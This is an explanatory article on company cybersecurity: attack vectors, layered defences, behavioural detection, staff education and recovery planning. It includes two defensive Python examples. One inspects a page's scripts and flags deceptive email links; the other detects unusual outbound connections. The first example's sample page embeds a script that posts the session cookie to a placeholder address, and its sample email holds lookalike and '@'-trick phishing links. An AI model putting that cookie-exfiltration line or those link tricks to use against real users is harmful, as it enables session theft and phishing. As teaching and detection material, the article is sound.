
How much cybersecurity does a company really need?  

Author: Joan Lauri Alemany

Cybersecurity has become a fundamental part of doing business. Regardless of size or industry, organizations are expected to invest significant time, money, and resources simply to protect their operations, employees, and information. 

Rather than focusing on specific technologies, vendors, or network architectures, I would like to take a more practical approach. How can a company be attacked? What are the most common attack vectors? And what options are available to reduce risk? 

Understanding the attack surface 

The first thing to consider is how a company’s information can be attacked. Let’s look at the following example:

We have employees working both inside and outside the office, connected directly or remotely to the corporate network and to the cloud services the company uses (AWS, Azure, Google Cloud, and others). 

Where can attacks come from? Broadly speaking, they arrive along three routes, and each needs its own controls: 

  • The company is attacked from outside its network. 
  • The company is attacked from within its own network. 
  • The company is attacked through its employees via different channels. 

External attacks: the traditional perimeter 

Historically (if we can even speak of history in a field that has evolved so rapidly), organizations have protected access to their networks and the Internet through firewalls and intelligent network devices capable of managing traffic and blocking unauthorized connections according to predefined security rules. 

This is the most common layer of protection, and it is fair to say that most companies, whether small, medium-sized, or large, have implemented it to a reasonable extent. Because these technologies have been around for many years, there is a large pool of professionals capable of deploying and managing them, and competition has made them more affordable and easier to implement. 

This is undoubtedly a mandatory first step for any organization. 

Does this mean that buying good hardware automatically makes a company secure? Unfortunately, no. 

A firewall has to let through the traffic the business depends on, and attackers ride that allowed traffic. Web browsing is the clearest case: an outbound connection to a web server is exactly what the rules permit, so what the browser fetches and runs is beyond the firewall's reach. 

The hidden risks of web browsing 

A very simple example: open your browser and visit any website. In the image below, you can see the result of a Google search displayed in Google Chrome.

I accessed the browser’s Developer Tools, a feature available to anyone. What appears on the screen is JavaScript code. 

Why? Because a webpage is not a static document that is simply displayed. When we access a website, our browser downloads code and executes it locally, building the page according to the instructions in that code, including headlines, links, images, videos, and interactive elements. 

The browser is effectively interpreting and executing a program written by whoever controls the site. 

At this point, it becomes easier to understand the risk of visiting a website created by someone with malicious intent. We may see a perfectly normal webpage while code we never asked for runs in the background. Browsers sandbox that code, so reaching the operating system usually takes a browser vulnerability or a user action, such as running a downloaded file, but within the browser the script already has a lot of room: it can imitate a login form, abuse the sessions the user is logged into, or make requests to other hosts the browser can reach. 

And we should not forget that our computer is connected to the company’s network. 

Organizations work hard to restrict access to risky websites, but employees need access to a vast number of online resources to perform their jobs. Controlling everything through this approach alone is extremely difficult.

Email remains one of the most effective attack vectors 

Another major attack vector is email. 

Email is allowed through the perimeter by design, because mail has to be delivered. A well-crafted message therefore often reaches an employee's inbox with nothing but a content filter between the attacker and the reader. 

How can an email deceive us? 

  • Through social engineering, convincing us to reveal information or perform actions we should not. 
  • Through seemingly legitimate links that redirect us to malicious websites. 
  • Through attachments that may contain malware, such as trojans, worms, or ransomware. 

Companies invest in email security solutions and employee awareness programs to help identify warning signs and reduce risk.
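Two of the risks described above, the code a page makes the browser execute and the email link that reads one way and points another, can both be inspected mechanically, and the same HTML parser serves both. The block below is an added example and is not part of the original article; the page and e-mail HTML are constructed samples, and every host name, address and path in them is a placeholder. It inventories where a page's scripts come from (first party, third party, inline, and which hosts inline code refers to) and flags links whose visible text or structure would mislead the reader.

```python
"""Added example: inventory the code a browser would run on a page, and flag links in an
HTML email whose visible text points somewhere other than where the href goes.
The sample HTML below is constructed for illustration; hosts and paths are placeholders."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class HtmlInspector(HTMLParser):
    """Collects <script> elements (src plus inline body) and <a> elements (href plus visible text)."""

    def __init__(self):
        super().__init__()
        self.scripts, self.links = [], []
        self._script = None   # [src, [text chunks]] while inside <script>
        self._link = None     # [href, [text chunks]] while inside <a>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._script = [a.get("src"), []]
        elif tag == "a" and a.get("href"):
            self._link = [a["href"], []]

    def handle_data(self, data):
        if self._script is not None:
            self._script[1].append(data)
        elif self._link is not None:
            self._link[1].append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self.scripts.append((self._script[0], "".join(self._script[1]).strip()))
            self._script = None
        elif tag == "a" and self._link is not None:
            self.links.append((self._link[0], "".join(self._link[1]).strip()))
            self._link = None


def _parse(html):
    p = HtmlInspector()
    p.feed(html)
    p.close()
    return p


def _host(url):
    return (urlparse(url).hostname or "").lower()


def script_origins(html, page_url):
    """Relative or same-host src is first party; any other host is third party;
    inline code is counted and the external hosts it mentions are listed."""
    page_host = _host(page_url)
    report = {"first_party": [], "third_party": [], "inline_count": 0, "inline_contacts": []}
    for src, body in _parse(html).scripts:
        if src is None:
            report["inline_count"] += 1
            for h in re.findall(r"https?://([A-Za-z0-9.-]+)", body):
                if h.lower() != page_host and h.lower() not in report["inline_contacts"]:
                    report["inline_contacts"].append(h.lower())
        elif _host(src) in ("", page_host):
            report["first_party"].append(src)
        else:
            report["third_party"].append(_host(src))
    return report


def _host_in_text(text):
    """Heuristic: does the visible link text itself look like a URL or host name?"""
    t = text.strip()
    if not t or " " in t or "." not in t:
        return None
    return _host(t if "://" in t else "http://" + t) or None


def deceptive_links(html, trusted=()):
    """Flag links where the reader would believe they are going somewhere else."""
    flagged = []
    for href, text in _parse(html).links:
        parts = urlparse(href)
        host = (parts.hostname or "").lower()
        reasons = []
        if "@" in parts.netloc:   # https://bank.example@evil.example really goes to evil.example
            reasons.append("userinfo before '@' hides the real host %s" % host)
        shown = _host_in_text(text)
        if shown and shown != host:
            reasons.append("visible text says %s but link goes to %s" % (shown, host))
        for d in trusted:         # trusted name used as a subdomain of someone else's domain
            if d in host and host != d and not host.endswith("." + d):
                reasons.append("embeds trusted name %s inside another domain" % d)
        if reasons:
            flagged.append({"href": href, "text": text, "reasons": reasons})
    return flagged


# Constructed sample page: two script files plus an inline script that posts the session
# cookie to an address unrelated to the page (the "normal-looking page" case from the text).
SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-cdn.net/lib.js"></script>
</head><body><h1>Quarterly report</h1>
<script>fetch("https://203.0.113.9/c", {method: "POST", body: document.cookie});</script>
</body></html>"""

# Constructed sample email: one lookalike domain, one userinfo trick, one legitimate link.
SAMPLE_EMAIL = """<p>Your password expires today.</p>
<a href="https://accounts.example-corp.com.login-verify.net/reset">https://accounts.example-corp.com/reset</a>
<a href="https://example-corp.com@198.51.100.7/">Open portal</a>
<a href="https://intranet.example-corp.com/hr">HR portal</a>"""

if __name__ == "__main__":
    print(script_origins(SAMPLE_PAGE, "https://intranet.example-corp.com/report"))
    for f in deceptive_links(SAMPLE_EMAIL, trusted=("example-corp.com",)):
        print(f["href"], "->", "; ".join(f["reasons"]))
```

The same two checks are what a mail gateway or a web proxy applies at scale; the value of running them by hand on one message is seeing how little the visible page or link text tells you about where the code or the click actually goes.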

Internal threats and privileged access 

Not all threats come from outside. 

Organizations must also consider internal threats, whether from dissatisfied employees, accidental misuse, or, in highly sensitive sectors such as defense or government, individuals attempting to gain unauthorized access to confidential information. 

Without properly defined access policies, even trusted users can become a significant source of risk. 

Remote work and mobile devices 

One of the biggest challenges facing organizations today is securing employees who work remotely or are constantly on the move. 

Most companies implement strict access policies, requiring employees to connect through authorized devices, over encrypted channels such as VPNs, and with multi-factor authentication. 

However, in our daily lives, we access countless websites, applications, and social media platforms. We are often redirected between services without even noticing. 

No matter how careful we are, we remain attractive targets for threat actors seeking to gain access to corporate environments. 

Smartphones present additional challenges. Even official app stores such as Apple App Store and Google Play are not completely free from malicious applications. We may never install them ourselves, but family members using the same home network could unknowingly introduce risks. 

To address these concerns, organizations increasingly separate personal and corporate environments on devices, deploy endpoint protection solutions, enforce security policies, and implement controls to protect data in case of loss or theft. 

Building layers of defence 

Having reviewed the vulnerabilities we face and the resources organizations must dedicate simply to protect themselves, we can now consider how companies defend their environments. 

One of the most effective approaches is network segmentation. 

Organizations divide their networks into different layers or zones and enforce strict controls between them, so that, for example, a compromised workstation in the office network cannot reach the database servers directly. This limits the spread of an attack and prevents a compromise in one area from affecting critical business systems. 

Of course, these controls come at a cost. They require investment, maintenance, and expertise. They can also introduce complexity and occasionally impact performance. 

However, they remain essential components of a modern cybersecurity strategy. 

From antivirus to behavioural detection 

Beyond network protection, organizations deploy solutions designed to identify abnormal behaviour on endpoints and devices. 

Traditional antivirus solutions rely on signatures, known patterns associated with previously identified malware. They continuously scan systems in search of these signatures and block threats when detected. The weakness is built in: a sample nobody has seen yet, or a known one repacked to change its bytes, matches no signature. 

Modern cybersecurity solutions have evolved to address this gap. 

Today, technologies such as EDR (Endpoint Detection and Response), NDR (Network Detection and Response), XDR (Extended Detection and Response), and mobile threat defence solutions use behavioural analysis and artificial intelligence to identify suspicious activity. 

For example, if a workstation whose user normally works in Excel and SAP suddenly begins making repeated connections to an external server the organization has never contacted before, that departure from its own baseline may indicate a compromise and trigger an investigation. 

These technologies represent some of the most advanced defensive capabilities currently available. They are not self-running, however: baselines need tuning to the organization's real traffic, and every alert needs someone able to investigate it. 
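The Excel-and-SAP scenario above is, at its core, a baseline and a deviation from it. The block below is an added example, not code from the article or from any EDR or NDR product: it learns which destinations and processes each host normally uses from a first batch of connection records, then flags a host that makes repeated connections to a destination outside that baseline within a short window, noting whether the process involved is also new for that host. The log format and every host, user and address in it are constructed for the example.

```python
"""Added example: a minimal behavioural baseline of the kind EDR/NDR products build at scale.
Learns which destinations and processes each host normally uses, then flags a host that
starts making repeated connections to a destination it has never contacted before.
Log lines below are constructed for illustration; hosts, users and addresses are placeholders."""
from collections import defaultdict
from datetime import datetime


def parse_line(line):
    """'ts host=... user=... proc=... dst=host:port' -> dict (constructed format, not a vendor's)."""
    ts, *fields = line.split()
    ev = {"ts": datetime.fromisoformat(ts)}
    for f in fields:
        k, _, v = f.partition("=")
        ev[k] = v
    ev["dst_host"], _, ev["dst_port"] = ev["dst"].rpartition(":")
    return ev


def build_baseline(events):
    """Per host: the set of destinations and the set of processes seen making connections."""
    base = defaultdict(lambda: {"dests": set(), "procs": set()})
    for e in events:
        base[e["host"]]["dests"].add(e["dst_host"])
        base[e["host"]]["procs"].add(e["proc"])
    return base


def detect(events, baseline, min_connections=5, window_minutes=10):
    """Alert when one host connects >= min_connections times, within window_minutes, to a
    destination outside its baseline. A host with no baseline at all is treated as all-new."""
    by_pair = defaultdict(list)
    for e in events:
        if e["dst_host"] not in baseline[e["host"]]["dests"]:
            by_pair[(e["host"], e["dst_host"])].append(e)
    alerts = []
    for (host, dst), evs in by_pair.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = 0, 0
        for end in range(len(evs)):          # sliding window over sorted timestamps
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window_minutes * 60:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_connections:
            procs = sorted({e["proc"] for e in evs})
            alerts.append({"host": host, "dst": dst, "count": best, "processes": procs,
                           "new_process": [p for p in procs if p not in baseline[host]["procs"]]})
    return alerts


# Constructed baseline: two days of ordinary activity for two workstations.
BASELINE_LOG = """2024-05-06T09:02:11 host=WS-114 user=jdoe proc=EXCEL.EXE dst=sharepoint.example-corp.com:443
2024-05-06T09:05:40 host=WS-114 user=jdoe proc=saplogon.exe dst=sap.internal.example:3200
2024-05-06T10:14:02 host=WS-114 user=jdoe proc=EXCEL.EXE dst=sharepoint.example-corp.com:443
2024-05-07T08:58:33 host=WS-114 user=jdoe proc=saplogon.exe dst=sap.internal.example:3200
2024-05-07T09:12:19 host=WS-207 user=mlee proc=chrome.exe dst=intranet.example-corp.com:443"""

# Constructed observation: WS-114 keeps its normal traffic but also beacons six times in
# three minutes to an address it never used, from a process it never used; WS-207 touches
# one new destination once, which stays below the threshold.
OBSERVED_LOG = """2024-05-08T09:01:05 host=WS-114 user=jdoe proc=EXCEL.EXE dst=sharepoint.example-corp.com:443
2024-05-08T09:03:17 host=WS-114 user=jdoe proc=powershell.exe dst=203.0.113.9:8443
2024-05-08T09:03:18 host=WS-114 user=jdoe proc=powershell.exe dst=203.0.113.9:8443
2024-05-08T09:03:49 host=WS-114 user=jdoe proc=powershell.exe dst=203.0.113.9:8443
2024-05-08T09:04:20 host=WS-114 user=jdoe proc=powershell.exe dst=203.0.113.9:8443
2024-05-08T09:05:02 host=WS-114 user=jdoe proc=powershell.exe dst=203.0.113.9:8443
2024-05-08T09:05:41 host=WS-114 user=jdoe proc=powershell.exe dst=203.0.113.9:8443
2024-05-08T09:06:00 host=WS-114 user=jdoe proc=saplogon.exe dst=sap.internal.example:3200
2024-05-08T09:10:00 host=WS-207 user=mlee proc=chrome.exe dst=docs.example-vendor.com:443"""


def run_detection(baseline_log=BASELINE_LOG, observed_log=OBSERVED_LOG):
    baseline = build_baseline(parse_line(l) for l in baseline_log.splitlines())
    return detect([parse_line(l) for l in observed_log.splitlines()], baseline)


if __name__ == "__main__":
    for a in run_detection():
        print("%(host)s -> %(dst)s: %(count)d connections, processes %(processes)s, "
              "new for this host: %(new_process)s" % a)
```

Note what the single alert here rests on: not a signature, not a known-bad address, only the fact that this host had never spoken to that destination and was suddenly doing so repeatedly. That is also why such detections need tuning, since a newly adopted SaaS tool produces exactly the same shape of event.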

How much cybersecurity is enough? 

At this point, a reasonable question arises: 

How much should I invest in cybersecurity? 

How far should I go to protect my business without turning cybersecurity into an economic burden? 

My personal view is that organizations should be realistic. 

Absolute security does not exist. No matter how much we invest, there will always be new threats, new vulnerabilities, and people looking for ways to exploit them. 

As long as we comply with the regulations applicable to our industry, cybersecurity should be approached as a balance between risk, cost, and business needs. 

The human factor: the most important investment

In my opinion, the most valuable investment any organization can make is education. 

Many people are not fully aware of what exists on the Dark Web, how easily stolen information can be obtained, or how accessible attack tools have become. 

There are highly skilled threat actors who continuously look for new ways to exploit vulnerabilities for financial gain. 

Educating users is the first step in reducing risk. 

If employees can identify suspicious emails, follow security policies, and use corporate resources responsibly, organizations can significantly reduce one of their largest attack surfaces: human error. 

Security policies, segmentation and access control 

Another key investment is network segmentation and access control. 

Organizations should ensure that users only have the access to information and resources required to perform their jobs. This is the principle of least privilege; its counterpart for information is the "need to know" rule, under which access to data is granted only to those whose work requires it. 

Security policies should also govern the devices connecting to corporate networks. 

A VPN does not prevent a device from becoming infected. It simply secures the communication path between the device and the company network, and once connected, an infected device brings that infection inside the perimeter. This is why the policy should also check the state of a device before it is allowed to connect. 

Organizations must therefore strike a balance between strong security controls and employee productivity, ensuring that protection measures do not become obstacles to daily work. 

Start with an assessment 

For organizations without a dedicated cybersecurity department, the most useful first step is often a cybersecurity assessment. 

Such assessments go beyond purely technical considerations. They typically include compliance requirements related to regulations and standards such as GDPR, NIS2, ISO standards such as ISO/IEC 27001, and other applicable obligations. 

The result is usually a practical roadmap that helps organizations understand their current position, identify weaknesses, prioritize improvements, and estimate the real cost of a cybersecurity strategy. 

Business continuity matters as much as prevention 

Finally, organizations must accept a simple reality: despite all our efforts, attacks can still succeed. 

That is why cybersecurity is not only about prevention but also about recovery. 

Backup strategies, incident response plans, and disaster recovery procedures should be carefully designed and tested long before they are needed. For backups in particular, at least one copy should be kept offline or otherwise out of reach of an attacker who already controls the network, since ransomware routinely targets backups before encrypting production systems, and a restore should be rehearsed, not assumed. 

When a serious incident occurs, affecting business operations and creating pressure across the organization, it is not the right time to start improvising. 

A well-prepared recovery strategy can make the difference between a temporary disruption and a major business crisis. 
